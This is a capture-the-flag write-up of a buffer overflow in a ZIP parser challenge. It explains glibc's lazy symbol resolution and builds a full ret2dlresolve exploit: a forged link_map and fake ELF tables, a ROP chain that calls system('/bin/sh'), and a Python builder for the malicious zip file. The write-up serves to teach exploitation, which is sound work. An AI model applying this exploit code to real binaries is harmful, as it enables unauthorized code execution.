Advanced CTF Writeup: Exploiting Buffer Overflow in ZIP Parser with ret2dlresolve
ret2dlresolve on x86_64 with large gap between text and writable sections
- Challenge: zip_parser
- Category: pwn
- Points: 500
- Challenge Author: seal9055
- Solution: solve.py
When a tree falls in the forest with no one around to hear it, some say that no sound is made. Does the same apply to processes without output?
TL;DR
zip_parser is a pwn challenge from UMass CTF 2022. The binary mimics a real-world zip parser that contains a buffer overflow caused by a missing bounds check. What makes the challenge hard is that the binary has no output function in its GOT, so no memory can be leaked before exploitation. ret2dlresolve is a suitable attack in this scenario.
Although the pwntools ret2dlresolve helpers work well for this challenge, they do not work for some 64-bit binaries with a large gap between the text and writable sections. I manually forged a link_map to deal with that case.
In this writeup, I go through my thought process while developing an exploit for this challenge, with a detailed explanation of my ret2dlresolve approach and several alternative approaches.
Static Analysis
To investigate the challenge binary, we can begin with some checksec and reverse engineering.
checksec
Reversing
Loading the binary in Ghidra gives us pretty messy decompiled code at first. Reverse engineering is not the focus of this writeup, so I will quickly go through the decompiled code and talk about what we can do to exploit it.
main()
main() is the entry point of the binary. It first reads the size of the zip file and then reads the zip file itself. After that, it parses the End of Central Directory, the Central Directory, and the Local Header, in that order.
parse_head()
Recall the layout of a zip file and of the End of Central Directory record (EOCD).
parse_head() searches for the signature 0x06054b50 that identifies the EOCD and loads the useful fields from it. The parsed data is then stored in a header struct that I defined in Ghidra to make the code more readable.
Line 18 checks comp_size <= 0x80, but it is not used in the rest of the program anyway.
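As a rough illustration of the EOCD search described above, here is a minimal Python sketch. It is not the binary's code: the name find_eocd and the returned keys are my own, searching for the last occurrence of the signature is my choice, and the field layout follows the standard 22-byte EOCD record.

```python
import struct

EOCD_SIGNATURE = 0x06054b50  # little-endian bytes: b"PK\x05\x06"
EOCD_FORMAT = "<IHHHHIIH"    # fixed part of the record, 22 bytes


def find_eocd(blob: bytes) -> dict:
    """Find the last EOCD signature in blob and unpack the fixed fields."""
    pos = blob.rfind(struct.pack("<I", EOCD_SIGNATURE))
    if pos < 0 or pos + struct.calcsize(EOCD_FORMAT) > len(blob):
        raise ValueError("no complete EOCD record found")
    fields = struct.unpack_from(EOCD_FORMAT, blob, pos)
    return {
        "offset": pos,
        "total_entries": fields[4],  # total number of central directory records
        "cd_size": fields[5],        # size of the central directory in bytes
        "cd_offset": fields[6],      # offset of the central directory in the archive
    }


# Toy archive: 4 bytes of filler followed by a hand-made EOCD record.
demo = b"AAAA" + struct.pack(EOCD_FORMAT, EOCD_SIGNATURE, 0, 0, 1, 1, 46, 100, 0)
eocd = find_eocd(demo)
```

The same offsets are used later when the malicious zip file is built by hand.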
parse_centdir()
parse_centdir() parses n Central Directory file headers.
parse_data()
parse_data() reads data from the Local File Header, copies the compressed data with memcpy to a buffer on the stack, and then copies it with strcpy to a newly allocated buffer on the heap.
Here comes our buffer overflow vulnerability. comp_size is read in lines 15 and 18 without any bounds check, and it can differ from the value loaded earlier by parse_centdir(). So we can make the program copy a large number of bytes from our crafted zip file onto the stack, overflowing the buffer and running our ROP chain.
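The mismatch between the two size fields can be pictured with a toy model. This is only a sketch under assumptions: that the 0x80 check is applied to the central directory's comp_size (the exploit later stores 0x40 there), and that the stack buffer is 0xa0 bytes, taken from the rbp - 0xa0 offset mentioned later. The function name is hypothetical.

```python
def bytes_past_buffer(cd_comp_size, lfh_comp_size, limit=0x80, buf_size=0xA0):
    """Toy model: validate one size field, then copy using another one."""
    if cd_comp_size > limit:
        raise ValueError("archive rejected: compressed size too large")
    # The copy length comes from the local file header and is never checked.
    return max(0, lfh_comp_size - buf_size)


# The central directory claims 0x40 bytes, the local header claims 0x108.
overflow = bytes_past_buffer(cd_comp_size=0x40, lfh_comp_size=0x108)
print(hex(overflow))
```

Any bytes past the buffer land on the saved rbp and the return address, which is what the ROP chain relies on.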
Exploitation
The most intuitive way to spawn a shell with a ROP chain is ret2libc. But take a look at the GOT via readelf -r chal:
Relocation section '.rela.dyn' at offset 0x618 contains 5 entries:
Offset Info Type Sym. Value Sym. Name + Addend
000000403ff0 000400000006 R_X86_64_GLOB_DAT 0000000000000000 __libc_start_main@GLIBC_2.2.5 + 0
000000403ff8 000700000006 R_X86_64_GLOB_DAT 0000000000000000 __gmon_start__ + 0
000000404080 000c00000005 R_X86_64_COPY 0000000000404080 stdout@GLIBC_2.2.5 + 0
000000404090 000d00000005 R_X86_64_COPY 0000000000404090 stdin@GLIBC_2.2.5 + 0
0000004040a0 000e00000005 R_X86_64_COPY 00000000004040a0 stderr@GLIBC_2.2.5 + 0
Relocation section '.rela.plt' at offset 0x690 contains 9 entries:
Offset Info Type Sym. Value Sym. Name + Addend
000000404018 000100000007 R_X86_64_JUMP_SLO 0000000000000000 strcpy@GLIBC_2.2.5 + 0
000000404020 000200000007 R_X86_64_JUMP_SLO 0000000000000000 setbuf@GLIBC_2.2.5 + 0
000000404028 000300000007 R_X86_64_JUMP_SLO 0000000000000000 read@GLIBC_2.2.5 + 0
000000404030 000500000007 R_X86_64_JUMP_SLO 0000000000000000 memcmp@GLIBC_2.2.5 + 0
000000404038 000600000007 R_X86_64_JUMP_SLO 0000000000000000 fgets@GLIBC_2.2.5 + 0
000000404040 000800000007 R_X86_64_JUMP_SLO 0000000000000000 memcpy@GLIBC_2.14 + 0
000000404048 000900000007 R_X86_64_JUMP_SLO 0000000000000000 malloc@GLIBC_2.2.5 + 0
000000404050 000a00000007 R_X86_64_JUMP_SLO 0000000000000000 atoi@GLIBC_2.2.5 + 0
000000404058 000b00000007 R_X86_64_JUMP_SLO 0000000000000000 exit@GLIBC_2.2.5 + 0
No print function is imported by this binary, so we can’t leak the location of libc and then return to system in libc.
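The same conclusion can be reached mechanically. The sketch below checks the import names copied from the .rela.plt listing above against a hand-picked, non-exhaustive set of output functions; the set itself is my assumption about what would be useful for a leak.

```python
# Imported functions, copied from the .rela.plt listing above.
plt_imports = ["strcpy", "setbuf", "read", "memcmp", "fgets",
               "memcpy", "malloc", "atoi", "exit"]

# A non-exhaustive list of libc functions commonly used to leak memory.
OUTPUT_FUNCTIONS = {"puts", "printf", "fputs", "fprintf", "putchar",
                    "write", "fwrite", "dprintf", "send"}

leak_candidates = sorted(set(plt_imports) & OUTPUT_FUNCTIONS)
print(leak_candidates or "no output function imported")
```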
ret2dlresolve
After hours of googling, I found that ret2dlresolve is the attack that works when we can execute a ROP chain but can’t leak any address from memory.
These online resources were crucial for me in solving this challenge. (Bear with me: the most useful one is in Chinese.)
Very helpful Resources
- ret2dlresolve超详细教程(x86&x64) - the resource that I followed to develop this exploitation
- redpwnCTF 2021 - devnull-as-a-service (pwn) - clear and understandable explanation to ret2dlresolve
- 0ctf babystack with return-to dl-resolve - another understandable explanation to ret2dlresolve, but on x86
- ret2dlresolve利用方法 - explanation of ret2dlresolve with diagrams, but in Chinese and on x86
_dl_runtime_resolve in short
In short, for a binary with Partial RELRO, when a function is called for the first time, the dynamic linker needs to look up its address in the library. _dl_runtime_resolve(link_map, rel_offset) is called to do the job.
To do so, the running program
- jumps to func@.plt (using index 1 as an example)
  - 0x401044 pushes the index 1 onto the stack. This is the index of that function's slot in the GOT (and of its entry in the PLT relocation table), used as rel_offset later.
- jumps to .plt
  - 0x401020 pushes the value stored at 0x404008 <_GLOBAL_OFFSET_TABLE_+0x8> onto the stack, which is a pointer to the true link_map in ld.so.
  - 0x401026 jumps to *0x404010 <_GLOBAL_OFFSET_TABLE_+0x10>, which holds the actual address of _dl_runtime_resolve().
$ objdump -dS chal
...
Disassembly of section .plt:
0000000000401020 <.plt>:
401020: ff 35 e2 2f 00 00 pushq 0x2fe2(%rip) # 404008 <_GLOBAL_OFFSET_TABLE_+0x8>
401026: f2 ff 25 e3 2f 00 00 bnd jmpq *0x2fe3(%rip) # 404010 <_GLOBAL_OFFSET_TABLE_+0x10>
40102d: 0f 1f 00 nopl (%rax)
401030: f3 0f 1e fa endbr64
401034: 68 00 00 00 00 pushq $0x0
401039: f2 e9 e1 ff ff ff bnd jmpq 401020 <.plt>
40103f: 90 nop
401040: f3 0f 1e fa endbr64
401044: 68 01 00 00 00 pushq $0x1
401049: f2 e9 d1 ff ff ff bnd jmpq 401020 <.plt>
40104f: 90 nop
...
- inside _dl_runtime_resolve(),
  - pop the address of link_map and rel_offset from the stack
  - locate the struct in .dynamic for .rel.plt using link_map
  - locate .rel.plt using data in .dynamic and rel_offset
  - locate .symtab using data in .rel.plt
  - locate .strtab using data in .symtab and load the function's name, e.g. “system”
  - load the address of that function from the library into the GOT
- call the function with arguments in registers
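The lookup chain in the list above (relocation entry, then symbol, then name) can be sketched on toy tables. This is an illustration only, not glibc's code: the tables are hand-built, the helper names are mine, and the struct sizes are those of Elf64_Rela and Elf64_Sym (24 bytes each).

```python
import struct

R_X86_64_JUMP_SLOT = 7
RELA_SIZE = 24  # sizeof(Elf64_Rela)
SYM_SIZE = 24   # sizeof(Elf64_Sym)


def r_sym(r_info: int) -> int:
    return r_info >> 32          # ELF64_R_SYM: symbol table index


def r_type(r_info: int) -> int:
    return r_info & 0xFFFFFFFF   # ELF64_R_TYPE: relocation type


def symbol_name(rela_plt: bytes, symtab: bytes, strtab: bytes, index: int) -> str:
    """Follow relocation -> symbol -> name for the given relocation index."""
    _r_offset, r_info, _r_addend = struct.unpack_from("<QQq", rela_plt, index * RELA_SIZE)
    if r_type(r_info) != R_X86_64_JUMP_SLOT:
        raise ValueError("not a PLT relocation")
    (st_name,) = struct.unpack_from("<I", symtab, r_sym(r_info) * SYM_SIZE)
    end = strtab.index(b"\x00", st_name)
    return strtab[st_name:end].decode()


# Toy tables with two imports; r_offset mirrors the first two GOT slots above.
strtab = b"\x00strcpy\x00setbuf\x00"
symtab = b"".join(struct.pack("<IBBHQQ", name, 0x12, 0, 0, 0, 0) for name in (0, 1, 8))
rela_plt = (struct.pack("<QQq", 0x404018, (1 << 32) | 7, 0)
            + struct.pack("<QQq", 0x404020, (2 << 32) | 7, 0))

print(symbol_name(rela_plt, symtab, strtab, 1))
```

Applied to the readelf output above, the Info value 0x000a00000007 for atoi decodes to symbol index 10 and relocation type 7.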
ret2dlresolve in general
However, if we push a corrupted rel_offset onto the stack first and then return directly to .plt, the resolver uses it to locate a fake .rel.plt, a fake .symtab, and a fake .strtab in order, and eventually loads our desired function from the library instead of the intended one.
Therefore, to conduct a ret2dlresolve, we only need to
- craft fake .rel.plt, .symtab, and .strtab tables carefully
- write the fake tables to a writable area in memory, denoted forged_area
- calculate rel_offset = (forged_area - JMPREL) // <size of the struct>, so that the resolver finds our fake .rel.plt table instead of the real one, due to the lack of a bounds check
- make rel_offset the next value on the stack
- return to .plt, and the resolver should then resolve our desired function and call it
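The rel_offset formula above only lands exactly on the fake entry if the distance from JMPREL is a multiple of the entry size. A minimal sketch of that calculation, assuming 24-byte Elf64_Rela entries and using the .rela.plt address 0x400690 and .bss + 0x100 = 0x404180 from this binary purely as sample inputs (the helper name is mine):

```python
RELA_SIZE = 24  # sizeof(Elf64_Rela) on x86_64


def reloc_index_for(jmprel: int, forged_area: int):
    """Return (aligned_addr, index) so that jmprel + index * RELA_SIZE == aligned_addr."""
    pad = -(forged_area - jmprel) % RELA_SIZE
    aligned = forged_area + pad
    return aligned, (aligned - jmprel) // RELA_SIZE


aligned_addr, index = reloc_index_for(0x400690, 0x404180)
print(hex(aligned_addr), index)
```

The fake relocation entry has to be written at aligned_addr rather than at the start of the area, and index is the value placed on the stack.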
This approach usually works well on 32-bit binaries. After reading the source code of pwntools' Ret2dlresolvePayload and rop.ret2dlresolve, I realized that this is also the general approach for ret2dlresolve on 64-bit machines. But it doesn’t always work out.
Problems on 64-bit machines with huge pages
The above approach has problems for 64-bit binaries with a large gap between the text and writable sections. _dl_fixup plays a role here in a way that is not an issue on 32-bit machines. It is explained in detail in the redpwnCTF 2021 - devnull-as-a-service (pwn) writeup:
The problem with this attack is that _dl_fixup uses the same array index for both SYMTAB and VERSYM. Each element in each of these arrays is a different size (24 and 2 bytes, respectively), so using the same index for both results in vastly different addresses for the structs. In binaries with BSS close to the other sections, this can sometimes work out. However, in 64-bit binaries that use huge pages (so BSS is very far from the other sections), this guarantees a segmentation fault when trying to index VERSYM if the structs are placed in BSS.
This is the case where the pwntools ret2dlresolve automation doesn’t work. It prints the following warning:
[!] Ret2dlresolve is likely impossible in this ELF (too big gap between text and writable sections).
If you get a segmentation fault with fault_addr = 0x42afd8, try a different technique.
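To see why the shared index matters, the sketch below computes which VERSYM address gets read for a fake symbol placed at a given address. All addresses here are hypothetical and chosen only to contrast a small gap with a large one; the entry sizes (24 and 2 bytes) are the ones quoted above.

```python
SYM_SIZE = 24    # sizeof(Elf64_Sym)
VERSYM_SIZE = 2  # sizeof(Elf64_Half)


def versym_probe(symtab: int, versym: int, fake_sym_addr: int):
    """Return (symbol index, address read from VERSYM) for a fake symbol."""
    index = (fake_sym_addr - symtab) // SYM_SIZE
    return index, versym + index * VERSYM_SIZE


# Hypothetical layout: SYMTAB at 0x400300, VERSYM at 0x400500.
near = versym_probe(0x400300, 0x400500, 0x404188)  # writable area close by
far = versym_probe(0x400300, 0x400500, 0xA00300)   # writable area 6 MiB away

print([hex(x) for x in near], [hex(x) for x in far])
```

In the near case the VERSYM read stays within a few kilobytes of the table, which may still be mapped. In the far case it lands about 512 KiB past VERSYM, where nothing is likely to be mapped.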
pwntools automation ret2dlresolve solution
Fortunately, the binary for this challenge doesn’t have the issue above. Looking at the section headers, we can tell that .bss is at 0x404080 and .rela.plt is at 0x400690.
$ readelf -S chal
There are 31 section headers, starting at offset 0x3c60:
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
...
[11] .rela.plt RELA 0000000000400690 00000690
00000000000000d8 0000000000000018 AI 6 24 8
...
[26] .bss NOBITS 0000000000404080 00003070
0000000000000048 0000000000000000 WA 0 0 32
...
So the most straightforward solution to this challenge is to use the pwntools ret2dlresolve helpers. seal9055, the author of this challenge, provides a surprisingly nice and concise exploit script using this method.
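For reference, the usual pwntools pattern looks roughly like the sketch below. This is not seal9055's actual script: the wrapper function, its parameters, and the padding argument are my own, and the import sits inside the function so the block can be loaded without pwntools installed. Ret2dlresolvePayload, rop.read, and rop.ret2dlresolve are the pwntools helpers mentioned above.

```python
def build_auto_chain(binary_path: str, padding: int):
    """Return (stage1, stage2): the overflow payload and the data that read() receives."""
    from pwn import ELF, ROP, Ret2dlresolvePayload, context  # requires pwntools

    elf = context.binary = ELF(binary_path)
    rop = ROP(elf)

    # pwntools forges the fake relocation, symbol and string for system("/bin/sh").
    dlresolve = Ret2dlresolvePayload(elf, symbol="system", args=["/bin/sh"])

    # Stage the forged structures at the address pwntools picked, then resolve.
    rop.read(0, dlresolve.data_addr, len(dlresolve.payload))
    rop.ret2dlresolve(dlresolve)

    return b"A" * padding + rop.chain(), dlresolve.payload
```

A call such as build_auto_chain("./chal", 0xa8) would give the two stages; the first still has to be wrapped in the zip structure described later.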
Another approach to ret2dlresolve - corrupt .dynamic
Another approach is described in redpwnCTF 2021 - devnull-as-a-service (pwn). It confused me a lot at first because the author has a variable named link_map in the exploit. However, it turns out that he didn’t forge a link_map manually. Instead, he corrupts the address of DT_STRTAB in .dynamic and only builds a fake .strtab table containing the string system.
This approach seems much easier than the previous one. The only problem is that the .dynamic section is not writable in most cases, so I’m not sure whether he actually got the exploit to work.
Yet another approach to ret2dlresolve - manually forge link_map
Yet another idea is proposed by ret2dlresolve超详细教程(x86&x64), and I didn’t find an English resource covering it.
The big idea comes from the implementation of _dl_fixup(), so we have to dive into its source code. I simplified the source code and added some comments for better understanding.
// https://code.woboq.org/userspace/glibc/elf/dl-runtime.c.html
_dl_fixup(struct link_map *l, ElfW(Word) reloc_arg) {
// Load address of DT_SYMTAB from link_map, DT_SYMTAB = 6
const ElfW(Sym) *const symtab = (const void *)D_PTR(l, l_info[DT_SYMTAB]);
// Load address of DT_STRTAB from link_map, DT_STRTAB = 5
const char *strtab = (const void *)D_PTR(l, l_info[DT_STRTAB]);
// Load the corresponding struct from .rela.plt, DT_JMPREL = 23
const PLTREL *const reloc =
(const void *)(D_PTR(l, l_info[DT_JMPREL]) + reloc_offset);
// Load the corresponding struct from .symtab
const ElfW(Sym) *sym = &symtab[ELFW(R_SYM)(reloc->r_info)];
const ElfW(Sym) *refsym = sym;
void *const rel_addr = (void *)(l->l_addr + reloc->r_offset);
lookup_t result;
DL_FIXUP_VALUE_TYPE value;
/* Sanity check that we're really looking at a PLT relocation. */
// Check that the relocation type (the low 32 bits of r_info) is 7
assert(ELFW(R_TYPE)(reloc->r_info) == ELF_MACHINE_JMP_SLOT);
/* Look up the target symbol. If the normal lookup rules are not
used don't look in the global scope. */
// Check if the visibility bits of sym->st_other are 0, normally they are
if (__builtin_expect(ELFW(ST_VISIBILITY)(sym->st_other), 0) == 0) {
const struct r_found_version *version = NULL;
// Check if DT_VERSYM in link_map is NULL, normally it's not
if (l->l_info[VERSYMIDX(DT_VERSYM)] != NULL) {
/* ***********************************************************************
Segmentation fault: this is where ret2dlresolve doesn't work on 64-bit
machines with huge pages.
When executing vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff to compute
the version number, the big gap between BSS and SYMTAB makes the symbol
index in reloc->r_info too large and finally leads to a segmentation fault.
To work around it, the first choice is to make DT_VERSYM in link_map
NULL. To do so, we need to leak the address of link_map, which
defeats the purpose of ret2dlresolve.
The second choice is to make the outer if fail, so we need to set
sym->st_other (the 6th byte of the struct) so that its visibility bits
are not 0, and fall through to the else branch below.
*********************************************************************** */
const ElfW(Half) *vernum =
(const void *)D_PTR(l, l_info[VERSYMIDX(DT_VERSYM)]);
ElfW(Half) ndx = vernum[ELFW(R_SYM)(reloc->r_info)] & 0x7fff;
version = &l->l_versions[ndx];
if (version->hash == 0) version = NULL;
}
/* We need to keep the scope around so do some locking. This is
not necessary for objects which cannot be unloaded or when
we are not using any threads (yet). */
int flags = DL_LOOKUP_ADD_DEPENDENCY;
if (!RTLD_SINGLE_THREAD_P) {
THREAD_GSCOPE_SET_FLAG();
flags |= DL_LOOKUP_GSCOPE_LOCK;
}
// On a 32-bit machine the program doesn't crash here, and result is the
// successfully looked-up base address of libc.
result = _dl_lookup_symbol_x(strtab + sym->st_name, l, &sym, l->l_scope,
version, ELF_RTYPE_CLASS_PLT, flags, NULL);
/* We are done with the global scope. */
if (!RTLD_SINGLE_THREAD_P) THREAD_GSCOPE_RESET_FLAG();
/* Currently result contains the base load address (or link map)
of the object that defines sym. Now add in the symbol
offset. */
// Similarly, on 32-bit machine, the function address is computed by
// value = result + st_value
value = DL_FIXUP_MAKE_VALUE(result, SYMBOL_ADDRESS(result, sym, false));
} else {
/* *************************************************************************
This is the key point for my approach. If we make the if statement above
fail, the function address is computed by
value = l->l_addr + st_value
In theory, we can control both of these values through link_map and
.symtab, and resolve to the function that we need by setting
l_addr = addr_system - addr_xxxx
st_value = real_xxxx
so that
value = addr_system - addr_xxxx + real_xxxx = real_system
************************************************************************* */
/* We already found the symbol. The module (and therefore its load
address) is also known. */
value = DL_FIXUP_MAKE_VALUE(l, SYMBOL_ADDRESS(l, sym, true));
result = l;
}
/* And now perhaps the relocation addend. */
value = elf_machine_plt_value(l, reloc, value);
if (sym != NULL &&
__builtin_expect(ELFW(ST_TYPE)(sym->st_info) == STT_GNU_IFUNC, 0))
value = elf_ifunc_invoke(DL_FIXUP_VALUE_ADDR(value));
/* Finally, fix up the plt itself. */
if (__glibc_unlikely(GLRO(dl_bind_not))) return value;
// Finally, write value into GOT
return elf_machine_fixup_plt(l, result, refsym, sym, reloc, rel_addr, value);
}
So our next goal is to forge link_map->l_addr and sym->st_value to be
link_map->l_addr = addr_system - addr_xxxx
sym->st_value = real_xxxx
and to make the visibility bits of st_other (the 6th byte of sym) non-zero, so that we get
value = addr_system - addr_xxxx + real_xxxx = real_system
as the resolved address. Here addr_system and addr_xxxx are offsets inside libc, while real_xxxx and real_system are runtime addresses. To do so, we need to look at the struct used in .symtab.
typedef struct {
Elf64_Word st_name; // 4 bytes /* Symbol name (string tbl index) */
unsigned char st_info; // 1 byte /* Symbol type and binding */
unsigned char st_other; // 1 byte /* Symbol visibility */
Elf64_Section st_shndx; // 2 bytes /* Section index */
Elf64_Addr st_value; // 8 bytes /* Symbol value */
Elf64_Xword st_size; // 8 bytes /* Symbol size */
} Elf64_Sym;
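If we can make the DT_SYMTAB pointer point to xxxx@got - 0x8 after the chain of look-ups, we get st_value = real_xxxx and, with high probability, st_other != 0. The reason is that st_other then overlaps the 6th byte of the preceding GOT entry, which is typically 0x7f once that entry has been resolved to a libc address.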
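The overlay trick and the address arithmetic can be checked offline. In the sketch below the libc base and all libc offsets are made-up values for illustration; only the GOT order (malloc, atoi, exit) and the Elf64_Sym layout come from the listings above.

```python
import struct

MASK64 = (1 << 64) - 1

# Hypothetical values, for illustration only.
libc_base = 0x7FFFF7DC0000
off_malloc, off_atoi, off_exit, off_system = 0x9A0E0, 0x43640, 0x455F0, 0x50D60

# Three consecutive, already resolved GOT slots: malloc, atoi, exit.
got = struct.pack("<QQQ", libc_base + off_malloc,
                  libc_base + off_atoi, libc_base + off_exit)

# Read an Elf64_Sym starting at atoi@got - 8, i.e. at the malloc slot.
st_name, st_info, st_other, st_shndx, st_value, st_size = struct.unpack_from("<IBBHQQ", got, 0)

# Non-zero visibility bits select the else branch of _dl_fixup.
takes_else_branch = (st_other & 0x3) != 0

# value = l_addr + st_value, computed modulo 2**64 like the real pointer math.
l_addr = (off_system - off_atoi) & MASK64
value = (l_addr + st_value) & MASK64

print(hex(st_other), takes_else_branch, hex(value))
```

The mask matters when system sits below the target function in libc: the difference is then negative and has to wrap around as an unsigned 64-bit value.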
With all the theory in place, we are ready to forge the link_map and the other tables.
Forge link_map
Recall the struct of link_map
struct link_map {
/* Difference between the address in the ELF
file and the addresses in memory. */
Elf64_Addr l_addr; // 8 bytes
char *l_name; // 8 bytes /* Absolute file name object was found in. */
Elf64_Dyn *l_ld; // 8 bytes /* Dynamic section of the shared object. */
struct link_map *l_next; // 8 bytes /* Chain of loaded objects. */
struct link_map *l_prev; // 8 bytes /* Chain of loaded objects. */
/* All following members are internal to the dynamic linker.
They may change without notice. */
/* This is an element which is only ever different from a pointer to
the very same copy of this type for ld.so when it is used in more
than one namespace. */
struct link_map *l_real; // 8 bytes
/* Number of the namespace this link map belongs to. */
Lmid_t l_ns; // 8 bytes
/* Indexed pointers to dynamic section. */
struct libname_list *l_libname; // 8 bytes
// l_info contains all the sym tables, 77 * 8 bytes
// l_info[5] is ptr to DT_STRTAB
// l_info[6] is ptr to DT_SYMTAB
// l_info[23] is ptr to DT_JMPREL
Elf64_Dyn *l_info[77];
...
size_t l_tls_firstbyte_offset;
ptrdiff_t l_tls_offset;
size_t l_tls_modid;
size_t l_tls_dtor_count;
Elf64_Addr l_relro_addr;
size_t l_relro_size;
unsigned long long l_serial;
struct auditstate l_audit[];
}
Here we only care about
- l_addr at offset 0x0
- l_info[5] at offset 0x68, which points to the .dynamic entry for .strtab
- l_info[6] at offset 0x70, which points to the .dynamic entry for .symtab
- l_info[23] at offset 0xf8, which points to the .dynamic entry for .rel.plt
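These offsets follow directly from the struct above: eight 8-byte members come before l_info, and each l_info slot is one pointer wide. A quick sanity check (the helper name is mine):

```python
PTR_SIZE = 8

# Members before l_info: l_addr, l_name, l_ld, l_next, l_prev,
# l_real, l_ns, l_libname (8 bytes each on x86_64).
L_INFO_START = 8 * PTR_SIZE

DT_STRTAB, DT_SYMTAB, DT_JMPREL = 5, 6, 23


def l_info_offset(tag: int) -> int:
    """Offset of l_info[tag] inside struct link_map."""
    return L_INFO_START + tag * PTR_SIZE


for name, tag in (("DT_STRTAB", DT_STRTAB), ("DT_SYMTAB", DT_SYMTAB), ("DT_JMPREL", DT_JMPREL)):
    print(name, hex(l_info_offset(tag)))
```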
BITMAP_64 = (1 << 64) - 1
# offset between system and target_func
target_func = 'atoi'
l_addr = libc.sym['system'] - libc.sym[target_func]
# link_map
link_map = flat({
0x0: l_addr & BITMAP_64, # l_addr
0x68: some_addr, # l_info[5], ptr to DT_STRTAB in _DYNAMIC
# we won't use it so any writable area
0x70: some_addr, # l_info[6], ptr to DT_SYMTAB in _DYNAMIC
0xf8: some_addr, # l_info[23], ptr to DT_JMPREL in _DYNAMIC
})
Forge DT_JMPREL, DT_SYMTAB, and DT_STRTAB
Tracking the link_map in gdb:
- GOT[1] (_GLOBAL_OFFSET_TABLE_+0x8), ptr to link_map
- the link_map
- l_info[23] in link_map, ptr to DT_JMPREL in _DYNAMIC
- DT_JMPREL in _DYNAMIC, ptr to DT_JMPREL. The struct contains d_tag and d_val, 16 bytes in total.
- DT_JMPREL, the .rel.plt table. We can tell that 0x404018 in the first entry is the address of strcpy@got.
So we need to make a struct for the fake _DYNAMIC entry and a struct for the fake .rel.plt.
# DT_JMPREL in _DYNAMIC
_jmprel_dyn = flat([
    0,          # d_tag
    some_addr   # d_val, ptr to DT_JMPREL
])
# DT_JMPREL
jmprel = flat([
    # normally this points to the real GOT, now we need an area to read/write.
    some_addr,  # rela->r_offset
    7,          # rela->r_info, 7>>32=0, points to index 0 of .symtab
    0           # rela->r_addend
])
DT_SYMTAB and DT_STRTAB work almost the same way. We need a struct for the fake DT_SYMTAB entry in _DYNAMIC, a struct for the fake .symtab, and a /bin/sh\00 string.
Merging the forged tables together, we end up with the following forge_data. For no particular reason, I use .bss + 0x100 to hold the forged data.
BITMAP_64 = (1 << 64) - 1
forge_area = elf.get_section_by_name(".bss")["sh_addr"] + 0x100
# offset between system and target_func
target_func = 'atoi'
l_addr = libc.sym['system'] - libc.sym[target_func]
forge_data = flat({
# link_map
0x0: l_addr & BITMAP_64, # l_addr
0x68: forge_area, # l_info[5], ptr to DT_STRTAB in _DYNAMIC
# we won't use it so any writable area
0x70: forge_area + 0x38, # l_info[6], ptr to DT_SYMTAB in _DYNAMIC
0xf8: forge_area + 0x8, # l_info[23], ptr to DT_JMPREL in _DYNAMIC
# _DYNAMIC
# for DT_JMPREL
0x8: flat([
0, # d_tag
forge_area + 0x18 # d_val, ptr to DT_JMPREL
]),
# for DT_SYMTAB
0x38: flat([
0, # d_tag
elf.got[target_func] - 0x8 # d_val, ptr to DT_SYMTAB
# s.t. st_value pts to the target function in GOT
]),
# DT_JMPREL
0x18: flat([
# normally this points to the real GOT, now we need an area to read/write.
forge_area - l_addr, # rela->r_offset
7, # rela->r_info, 7>>32=0, points to index 0 of .symtab
0 # # rela->r_addend
]),
# DT_STRTAB
0x48: b'/bin/sh\00',
})
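Because several structures are packed into the unused gaps of the fake link_map, it is worth checking that none of them overlap. The sketch below re-states the offsets and sizes from forge_data above and verifies them; the region labels and the helper are my own.

```python
# (offset, size) of every region written into forge_data above.
layout = {
    "l_addr":            (0x00, 8),
    "dyn entry, JMPREL": (0x08, 16),  # d_tag + d_val
    "fake Elf64_Rela":   (0x18, 24),  # r_offset + r_info + r_addend
    "dyn entry, SYMTAB": (0x38, 16),
    "/bin/sh string":    (0x48, 8),
    "l_info[5]":         (0x68, 8),
    "l_info[6]":         (0x70, 8),
    "l_info[23]":        (0xF8, 8),
}


def find_overlaps(regions):
    """Return pairs of neighbouring regions whose byte ranges collide."""
    ordered = sorted(regions.items(), key=lambda item: item[1][0])
    clashes = []
    for (name_a, (start_a, size_a)), (name_b, (start_b, _)) in zip(ordered, ordered[1:]):
        if start_a + size_a > start_b:
            clashes.append((name_a, name_b))
    return clashes


total_size = max(start + size for start, size in layout.values())
print(find_overlaps(layout), hex(total_size))
```

The total of 0x100 bytes is what the read call in the ROP chain has to transfer.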
Make ROP chain
The ROP chain is relatively simple:
- read the forge_data into .bss + 0x100
- call _dl_runtime_resolve with the parameters, putting link_map and rel_offset on the stack
- align the stack if needed
rop = ROP([elf])
# bypass push link_map by adding 0x6 offset
resolver = elf.get_section_by_name(".plt")["sh_addr"] + 0x6
rop.read(0, forge_area, len(forge_data)) # read the link_map
rop.raw(rop.ret) # align stack to 0x10 to call system successfully
rop.call(resolver, [forge_area + 0x48]) # call system("/bin/sh")
rop.raw(forge_area) # link_map
rop.raw(0) # rel_offset
Construct zip file
Recall the zip file structure from above. As long as we follow the file structure carefully, we can build a zip file that carries our ROP chain. The local buffer in the parse_data stack frame is located at rbp - 0xa0, so we need 0xa8 bytes of padding in the compressed data (0xa0 for the buffer plus 8 for the saved rbp) before the ROP chain reaches the return address.
PH = b'A' # place holder
# Make compressed data
comp_data = PH * 0xa8
comp_data += rop.chain()
# 1. Make local file header
comp_size = len(comp_data)
len_file_name = 8 # for easier alignment
len_extra_field = 0
len_comment = 0
LFH = p32(0x04034b50)
LFH += PH * 14
LFH += p32(comp_size) # Compressed size
LFH += PH * 4
LFH += p16(len_file_name) # length file name
LFH += p16(len_extra_field) # length of extra field
LFH += PH * len_file_name # file name
LFH += PH * len_extra_field # extra field
# 2. Make Central directory file header
CDFH = p32(0x02014b50)
CDFH += PH * 16
CDFH += p32(0x40) # Compressed size, HACKED
CDFH += PH * 4
CDFH += p16(len_file_name) # File name length
CDFH += p16(len_extra_field) # Extra field length
CDFH += p16(len_comment) # File comment length
CDFH += PH * 8
CDFH += p32(0) # Relative offset of local file header.
CDFH += PH * len_file_name # file name
CDFH += PH * len_extra_field # extra field
CDFH += PH * len_comment # comment
# 3. Make End of central directory record (EOCD)
cd_size = len(CDFH)
# Offset of start of central directory, relative to start of archive
cd_offset = len(LFH) + len(comp_data)
EOCD = p32(0x06054b50) # End of central directory record
EOCD += PH * 6
# Total number of central directory records
EOCD += p16(1)
# Size of central directory (bytes)
EOCD += p32(cd_size)
# Offset of start of central directory, relative to start of archive
EOCD += p32(cd_offset)
EOCD += PH * 2
zip_file = LFH + comp_data + CDFH + EOCD
size_t = len(zip_file)
The final zip file is 394 bytes.
